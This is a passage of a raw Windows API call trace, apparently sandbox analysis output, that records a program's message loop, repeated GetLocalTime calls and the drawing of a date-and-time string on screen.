wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x350)) [0104.108] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.128] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.128] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.128] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x365)) [0104.128] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x365)) [0104.129] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.136] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.136] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.136] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x36d)) [0104.137] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x36d)) [0104.137] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.156] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.156] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.156] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x381)) [0104.157] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x381)) [0104.157] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.167] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.167] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.167] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x38c)) [0104.168] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x38c)) [0104.168] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.183] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.183] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.183] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x39c)) [0104.184] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x39c)) [0104.184] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.203] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.203] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.203] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x3b0)) [0104.203] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x3b0)) [0104.204] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.214] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.214] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.214] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x3bb)) [0104.214] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x3bb)) [0104.215] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.238] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.238] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.238] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x3d3)) [0104.239] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x3d4)) [0104.239] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.248] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.248] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.248] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x3dd)) [0104.248] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x3dd)) [0104.249] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.268] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.268] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.268] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x9)) [0104.268] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x9)) [0104.269] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0104.269] GetDC (hWnd=0x0) returned 0xa0100d0 [0104.269] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0104.269] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0104.269] GetSysColor (nIndex=8) returned 0x0 [0104.269] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0104.269] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0104.269] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0104.269] UnrealizeObject (h=0x2d10099f) returned 1 [0104.269] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0104.269] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0104.269] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0104.269] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:34 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:34 PM", lprc=0x19f5bd) returned 13 [0104.269] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0104.269] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0104.269] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0104.269] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0104.270] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0104.270] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.279] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.279] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.279] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x14)) [0104.279] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x14)) [0104.280] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.304] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.304] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.304] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x2d)) [0104.304] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x2d)) [0104.304] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.314] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.314] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.314] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x37)) [0104.314] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x37)) [0104.315] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.325] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.325] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.325] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x42)) [0104.325] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x42)) [0104.325] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.346] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.346] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.346] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x57)) [0104.346] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x57)) [0104.346] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.356] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.356] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.357] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x61)) [0104.357] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x61)) [0104.357] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.386] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.386] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.386] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x7f)) [0104.386] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x7f)) [0104.387] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.407] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.407] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.407] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x94)) [0104.407] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x95)) [0104.408] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.419] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.419] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.419] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x9f)) [0104.419] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0xa0)) [0104.419] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.440] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.440] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.440] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0xb5)) [0104.440] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0xb5)) [0104.441] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.450] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.450] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.450] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0xbf)) [0104.450] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0xbf)) [0104.450] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.471] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.471] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.471] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0xd4)) [0104.471] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0xd4)) [0104.471] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.481] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.481] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.481] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0xde)) [0104.481] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0xde)) [0104.481] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.503] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.503] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.503] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0xf4)) [0104.503] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0xf4)) [0104.503] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.513] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.513] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.513] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0xfe)) [0104.513] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0xfe)) [0104.513] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.528] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.528] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.528] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x10d)) [0104.528] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x10d)) [0104.528] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.548] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.548] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.548] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x121)) [0104.548] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x121)) [0104.548] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.559] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.559] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.559] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x12c)) [0104.559] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x12c)) [0104.559] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.580] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.580] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.580] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x141)) [0104.580] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x141)) [0104.580] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.591] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.591] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.591] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x14c)) [0104.591] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x14c)) [0104.591] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.612] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.612] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.612] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x161)) [0104.612] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x161)) [0104.612] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.623] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.623] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.623] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x16c)) [0104.623] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x16c)) [0104.623] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.644] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.644] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.644] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x181)) [0104.644] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x181)) [0104.644] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.654] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.654] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.654] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x18b)) [0104.654] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x18b)) [0104.654] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.667] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.667] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.668] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, 